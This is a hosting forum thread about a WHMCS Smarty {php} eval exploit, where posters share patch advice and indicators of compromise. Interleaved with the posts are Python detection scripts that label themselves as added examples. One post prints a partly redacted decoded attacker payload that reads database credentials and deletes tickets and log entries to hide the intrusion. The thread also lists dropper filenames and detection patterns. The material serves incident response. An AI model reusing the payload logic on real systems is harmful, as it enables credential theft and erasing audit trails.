Web Hosting Talk : Hosting Security and Technology

WHMCS Attack through php eval - Is my WHMCS is hacked?
#31 (m8internet), Web Hosting Master
Join Date: Feb 2003
Location: Cumbernauld, Scotland, UK
Posts: 720
Quote: Originally Posted by cpoalmighty
Isn't dl a standard WHMCS file?
What do we have to look for specifically?
Yes, dl.php is a WHMCS system file
Look at the date of the files on FTP
If they have the same date as the support ticket then you know it has been compromised

As I posted some time ago, the exploit assumes eval is ON
My solution was to turn eval OFF
Obviously if you need to use eval in php then you need to apply the patch

Equally, only my customers can submit support tickets
As a result this attacker had to register as a new customer first
Clearly it is a person rather than a bot as they took the time to make sure they put the correct city (to match the IP address from Saudi Arabia) and even answered some of the questions!

#32, Web Hosting Master
Join Date: Mar 2009
Posts: 2,203
Quote: Originally Posted by bear
The solution appears to be to apply the patch and possibly block subjects that begin with that tag. If you have a mod_sec rule that defeats this, that should be no problem.
Hi, I use WHM/cPanel and installed WHMCS on it. Can I ask how you use a mod_sec rule to secure it more? Thanks.

#33, Actively learning French
Join Date: Apr 2009
Location: OnTheWeb
Posts: 2,006
Quote: Originally Posted by m8internet
Yes, dl.php is a WHMCS system file
Look at the date of the files on FTP
If they have the same date as the support ticket then you know it has been compromised

As I posted some time ago, the exploit assumes eval is ON
My solution was to turn eval OFF
Obviously if you need to use eval in php then you need to apply the patch

Equally, only my customers can submit support tickets
As a result this attacker had to register as a new customer first
Clearly it is a person rather than a bot as they took the time to make sure they put the correct city (to match the IP address from Saudi Arabia) and even answered some of the questions!
Good detective work

I'm safe because I just double checked it (that means that the patch is working)

<<<snipped my content >>>

#34 (msam029), Newbie
Join Date: Dec 2011
Posts: 20
This is really a great security issue. Has WHMCS rolled out any patch for it?

Quote: Originally Posted by DewlanceHosting
I decoded his code through a base64 decoder:

Code:
$text=file_get_contents("configuration.php");
REMOVED.....
eval($text);   // loads the database credentials ($db_host, $db_username, ...) from the WHMCS configuration.php

$db=mysql_connect($db_host,$db_username,$db_password) or die("Can't open connection to MySQL");
mysql_select_db($db_name) or die("Can't select database");
// 0x257B7068707D25 is the MySQL hex literal for '%{php}%': deletes the tickets whose title carried the {php} payload
$delete ="DELETE from tbltickets WHERE title like 0x257B7068707D25;";
mysql_query($delete);
// then removes the attacker's own IP address from the WHMCS activity log
$delete2 ="DELETE from tblactivitylog WHERE ipaddr='".$_SERVER['REMOTE_ADDR']."';";
REMOVED!!!!! so others will not use this...

#35, Web Hosting Master
Join Date: Nov 2004
Location: Australia
Posts: 1,529
Quote: Originally Posted by msam029
This is really a great security issue. Has WHMCS rolled out any patch for it?
Weeks ago, don't tell me you haven't been paying attention to any of the MANY notices about it - on here, in WHMCS itself, on their site, in their forums ...

#36 (Joe), Securing the Dragon.
Join Date: Feb 2007
Location: Federal Heights, CO
Posts: 1,793
Just wanted to add some more info to this thread. Initial exploit attempts against us were trying to place a file called b0x.php in the following directories:
Code:
templates_c
images
A quick way to search for the known exploit files:
Code:
find / | grep b0x.php
find / | grep dl.php
find / | grep wh.php
find / | grep xfr.php
find / | grep sss.php
find / | grep ed8.php
find / | grep test.php
find / | grep red.php
Just a heads up.
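The two checks described in this thread so far, the known dropper filenames and drop directories from post #36 and post #31's advice to compare file dates against the time of the malicious ticket, can be combined into one triage pass. The script below is an added example, not code from the thread or from WHMCS; the directory tree that build_demo() lays out and the ticket timestamp are constructed for illustration.

```python
"""Filesystem triage for a WHMCS install after a suspicious ticket.

Added example, not code from the thread or from WHMCS. It combines the
dropper filenames and drop directories listed in post #36 with post #31's
advice to compare file modification times against the time of the
offending ticket. The tree built by build_demo() is constructed.
"""
import os
import tempfile
from datetime import datetime, timedelta
from typing import List, Tuple

# Filenames reported in post #36. dl.php is left out of this set because the
# thread confirms it is also a legitimate WHMCS file; a tampered copy is
# caught by the modification-time check instead of by name.
KNOWN_DROPPER_NAMES = {"b0x.php", "wh.php", "xfr.php", "sss.php",
                       "ed8.php", "test.php", "red.php"}
# Directories the dropper was written into, per post #36.
DROP_DIRS = {"templates_c", "images"}


def scan_webroot(root: str, ticket_time: datetime,
                 window: timedelta = timedelta(hours=1)) -> List[Tuple[str, str]]:
    """Return sorted (path, reason) pairs for files that deserve a manual look."""
    findings = []
    lo, hi = ticket_time - window, ticket_time + window
    for dirpath, _dirs, files in os.walk(root):
        in_drop_dir = os.path.basename(dirpath) in DROP_DIRS
        for name in files:
            path = os.path.join(dirpath, name)
            if name in KNOWN_DROPPER_NAMES:
                findings.append((path, "known dropper filename"))
            if not name.lower().endswith(".php"):
                continue
            mtime = datetime.fromtimestamp(os.path.getmtime(path))
            if lo <= mtime <= hi:
                where = "in a drop directory" if in_drop_dir else "outside the drop directories"
                findings.append((path, f"php file modified within {window} of the ticket, {where}"))
    return sorted(findings)


def build_demo(root: str, ticket_time: datetime) -> None:
    """Lay out a constructed WHMCS-like tree: two old core files, one fresh
    image, and two freshly written PHP files in the drop directories."""
    old = (ticket_time - timedelta(days=30)).timestamp()
    fresh = (ticket_time + timedelta(minutes=5)).timestamp()
    layout = {
        "index.php": old,
        "dl.php": old,
        os.path.join("images", "logo.png"): fresh,
        os.path.join("templates_c", "b0x.php"): fresh,
        os.path.join("images", "wh.php"): fresh,
    }
    for rel, ts in layout.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="utf-8") as fh:
            fh.write("placeholder\n")   # constructed content, not real files
        os.utime(path, (ts, ts))        # backdate or freshen the mtime


def run_demo() -> List[Tuple[str, str]]:
    """Build the constructed tree in a temp dir, scan it, return the findings."""
    ticket_time = datetime(2011, 12, 5, 14, 30)   # constructed ticket timestamp
    with tempfile.TemporaryDirectory() as root:
        build_demo(root, ticket_time)
        return scan_webroot(root, ticket_time)


if __name__ == "__main__":
    for path, reason in run_demo():
        print(f"{reason}: {path}")
```

Against a real install, call scan_webroot() with the document root and the ticket's submission time taken from the WHMCS ticket view; widen the window if the attacker's ticket and file drop were not close together. Every hit still needs a manual read, since a legitimate upgrade around the same time would also land in the window.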

__________________
-Joe @ Secure Dragon LLC.
#37, Web Hosting Master
Join Date: May 2009
Location: Area 51
Posts: 1,271
Thanks for the heads up Joe!


#38 (Ashton), Web Hosting Master
Join Date: May 2010
Posts: 655
The attackers keep trying to exploit our WHMCS, a couple of tickets a week. Unfortunately for them it was patched from day one of the exploit. I have had to disable them and allow them for clients only.

- Ashton


#39, Community Liaison
Join Date: Aug 2009
Location: 2607:FF68:100:11
Posts: 3,298
We get about 5 of these tickets a day. Patched it the day the email was received from WHMCS about it. It's most likely going to be an on-going issue (Receiving the emails meaning) for a couple of months until they realize all of the legitimate WHMCS setups have been patched.

#40 (Maxnet), Aspiring Evangelist
Join Date: Dec 2004
Posts: 414
Quote: Originally Posted by almanox
Disabling php tag has been one of the security features of smarty templates for years. Weird it created issues just now. I used to believe it was disabled in such serious projects as billing systems but seems like it was not at least in email/ticket parsing code.
I do not think the vulnerability is in the ticket code itself, but elsewhere.

A patch has been released recently, for an issue that allows any local file on the webserver to be displayed/interpreted as template file.

So I assume the ticket facility is merely used as a way to get a file uploaded, that is later executed by using the vulnerability.

Be aware that there may be other ways for an attacker to get a file uploaded on your system (e.g. through another website hosted on the same webserver).
So people should not assume they are secure because they disabled their ticket system, or set it to "customers only".
Make sure you applied the patch instead.


BTW it seems WHMCS uses {php} in their own templates as well:

Code:
$ grep -R "{php}" *
orderforms/boxes/products.tpl:{php}
orderforms/boxes/configureproductdomain.tpl:www. <input type="text" name="sld[2]" size="40" value="{$sld}" /> . <input type="text" name="tld[2]" size="7" value="{php}
So disabling code execution in Smarty might break legitimate functionality.

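Post #32 asks how to block these tickets in front of WHMCS, the decoded payload in #34 shows the attacker cleaning up rows whose title matches the hex literal 0x257B7068707D25, and post #40 shows that {php} is also used in WHMCS's own templates, so the filter belongs on ticket input rather than on the template engine. The following is an added example, not WHMCS or ModSecurity code: a matcher for the Smarty {php} tag, a decoder for the hex literal, and a triage pass over constructed sample tickets. It generalises bear's suggestion to block subjects that begin with the tag by matching the tag anywhere in subject or body.

```python
"""Filtering inbound ticket text for Smarty {php} tags.

Added example, not WHMCS or ModSecurity code. The sample tickets below are
constructed. The tag regex is tolerant of case and internal whitespace and
matches the tag anywhere in the text, a generalisation of the thread's
"block subjects that begin with that tag".
"""
import re
from typing import Dict, List, Tuple

# Smarty's {php} open/close tag. It does not match ordinary Smarty variables
# such as {$sld}, nor the bare word "php" in prose.
SMARTY_PHP_TAG = re.compile(r"\{\s*/?\s*php\s*\}", re.IGNORECASE)


def contains_smarty_php_tag(text: str) -> bool:
    """True if the text contains a {php} or {/php} tag anywhere."""
    return SMARTY_PHP_TAG.search(text) is not None


def decode_mysql_hex_literal(literal: str) -> str:
    """Turn a MySQL hex string literal such as 0x257B7068707D25 into text,
    which is how the payload in post #34 spelled its LIKE pattern."""
    if not literal.lower().startswith("0x"):
        raise ValueError("not a MySQL hex literal")
    return bytes.fromhex(literal[2:]).decode("ascii")


def triage_tickets(tickets: List[Dict[str, str]]
                   ) -> Tuple[List[Dict[str, str]], List[Dict[str, str]]]:
    """Split tickets into (accepted, rejected); a hit in subject or body rejects."""
    accepted, rejected = [], []
    for t in tickets:
        if contains_smarty_php_tag(t["subject"]) or contains_smarty_php_tag(t["body"]):
            rejected.append(t)
        else:
            accepted.append(t)
    return accepted, rejected


# Constructed sample tickets: one benign, one with the tag in the subject,
# one with the tag hidden in the body in mixed case with extra whitespace.
SAMPLE_TICKETS = [
    {"subject": "Invoice question", "body": "Hi, my invoice shows the wrong amount."},
    {"subject": "{php} help with my account", "body": "please look"},
    {"subject": "PHP version", "body": "can you run { PHP } echo 1; {/PHP} for me?"},
]

if __name__ == "__main__":
    ok, bad = triage_tickets(SAMPLE_TICKETS)
    print(f"accepted {len(ok)}, rejected {len(bad)}")
    print("0x257B7068707D25 decodes to", decode_mysql_hex_literal("0x257B7068707D25"))
```

The same regular expression can be placed in a ModSecurity SecRule (an @rx match over ARGS) on the ticket submission URL, which is what post #32 is asking for; the Python version above is the logic to test the pattern against real subjects before deploying it. Keep the rule scoped to inbound ticket and e-mail import paths so it does not interfere with the templates in post #40 that legitimately contain {php}.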


#41 (djeuro), Junior Guru Wannabe
Join Date: Oct 2009
Location: Chicago, Illinois
Posts: 60
Alright, this is what's up.

Most of you have been getting these, and don't know what is happening.

First of all, run through all of your logs, check the IPs of admins logged, and the actions executed.

This exploit was around before the patch was even up, so most people have been compromised before they even patched it.

Patching this doesn't mean you are now safe and secure. What I have been seeing mostly is that the hackers have exploited and injected a backdoor page. This page can be ANYWHERE on your website. It is a page that decrypts your admin password, and pretty much anything in your system.

The solutions:
EASIEST: Back up your database, and DELETE EVERYTHING from your public_html to make sure you delete the backdoor file that was injected. Then download the newest most stable release of WHMCS, and attach it to your DB. Make sure to change ALL PASSWORDS. That includes admin, SQL passwords, SQL username passwords, etc. Also change your database name and username that connects to the database. This will make sure that the backdoors have been deleted and you are now up-to-date with new passwords, and all the patched files. Lastly, if you have regular index.php files on your web server that are not attached to WHMCS, look through those files carefully for any of the possible injected code.


The second option is just much more painful. This would include looking through every single file in your system and every single folder to find any compromised files.

Hope this helps.

#42 (bear), Community Leader
Join Date: Oct 2002
Location: Mayberry
Posts: 19,951
Quote: Originally Posted by Maxnet
A patch has been released recently, for an issue that allows any local file on the webserver to be displayed/interpreted as template file.
That exploit was patched a while back, this eval exploit is much newer and patched on Dec 1.
Quote: Originally Posted by djeuro
This exploit was around before the patch was even up, so most people have been compromised before they even patched it.
Hard to patch before the exploit was found.




#43 (djeuro), Junior Guru Wannabe
Join Date: Oct 2009
Location: Chicago, Illinois
Posts: 60
Quote: Originally Posted by bear
That exploit was patched a while back, this eval exploit is much newer and patched on Dec 1.

Hard to patch before the exploit was found.
Well yes it's hard to patch it before exploit is found, that's why I just explained the steps to take now instead of saying people should have found it before the actual patch.

#44 (brianoz), Web Hosting Master
Join Date: Nov 2004
Location: Australia
Posts: 1,529
Quote: Originally Posted by djeuro
This exploit was around before the patch was even up, so most people have been compromised before they even patched it.
Thanks for your post.

Actually it would be extremely helpful if you could be more explicit about what signs of hacking to look for. It should be possible to use "grep -r" to find exploits if we know what to look for, for example, iframes etc.
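Post #41 says the backdoor file can sit anywhere in the site and that plain index.php files should be read for injected code, and the post above asks for grep-able signs. The script below is an added example, not code from the thread: it walks a web root and reports lines containing the two constructs the thread itself names, eval() and base64_decode(), plus long base64 blobs, which those constructs typically wrap. The clean and injected sample files it writes are constructed. Hits are leads for a manual read, not verdicts, since legitimate code can use either function.

```python
"""Content scan for injected PHP in a web root.

Added example, not code from the thread. Reports lines that use eval(),
base64_decode(), or a long run of base64 characters, the constructs the
thread associates with the injected backdoor. Sample files are constructed.
"""
import os
import re
import tempfile
from typing import List, Tuple

INDICATORS = [
    ("eval()", re.compile(r"\beval\s*\(", re.IGNORECASE)),
    ("base64_decode()", re.compile(r"\bbase64_decode\s*\(", re.IGNORECASE)),
    # 120+ base64 characters in a row: code hidden as an opaque string
    ("long base64 blob", re.compile(r"[A-Za-z0-9+/]{120,}={0,2}")),
]
SCAN_EXTENSIONS = (".php", ".phtml", ".inc", ".tpl")


def scan_file(path: str) -> List[Tuple[str, int, str]]:
    """Return (path, line_number, indicator) for every matching line."""
    hits = []
    with open(path, "r", encoding="utf-8", errors="replace") as fh:
        for lineno, line in enumerate(fh, start=1):
            for label, pattern in INDICATORS:
                if pattern.search(line):
                    hits.append((path, lineno, label))
    return hits


def scan_tree(root: str) -> List[Tuple[str, int, str]]:
    """Walk root and scan every file with a PHP-related extension."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name.lower().endswith(SCAN_EXTENSIONS):
                hits.extend(scan_file(os.path.join(dirpath, name)))
    return sorted(hits)


# Constructed sample files: a clean page and one with an injected line.
# The base64 string decodes to the letters ABC repeated; it is not code.
CLEAN_INDEX = "<?php\nrequire 'init.php';\n$smarty->display('homepage.tpl');\n"
INJECTED_INDEX = (
    "<?php\nrequire 'init.php';\n"
    "eval(base64_decode('" + "QUJD" * 40 + "'));\n"
    "$smarty->display('homepage.tpl');\n"
)


def run_demo() -> List[Tuple[str, int, str]]:
    """Write the two samples under a temp root, scan, return relative hits."""
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, "clean"))
        os.makedirs(os.path.join(root, "other-site"))   # a second site on the same server
        with open(os.path.join(root, "clean", "index.php"), "w", encoding="utf-8") as fh:
            fh.write(CLEAN_INDEX)
        with open(os.path.join(root, "other-site", "index.php"), "w", encoding="utf-8") as fh:
            fh.write(INJECTED_INDEX)
        return [(os.path.relpath(p, root), n, label) for p, n, label in scan_tree(root)]


if __name__ == "__main__":
    for rel, lineno, label in run_demo():
        print(f"{rel}:{lineno}: {label}")
```

Run scan_tree() over the whole document root of the server, not only the WHMCS directory, because post #40 points out that the dropped file may have arrived through a different site on the same host. Compare any hit against a clean copy of the same file from the vendor download before deciding it is malicious.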

#45 (djeuro), Junior Guru Wannabe
Join Date: Oct 2009
Location: Chicago, Illinois
Posts: 60
Quote: Originally Posted by brianoz
Thanks for your post.

Actually it would be extremely helpful if you could be more explicit about what signs of hacking to look for. It should be possible to use "grep -r" to find exploits if we know what to look for, for example, iframes etc.
I am actually more than willing to share the whole script with you guys since one of my sites was injected with this. The more we can see about it, the more we can patch.

Contact me over PM.
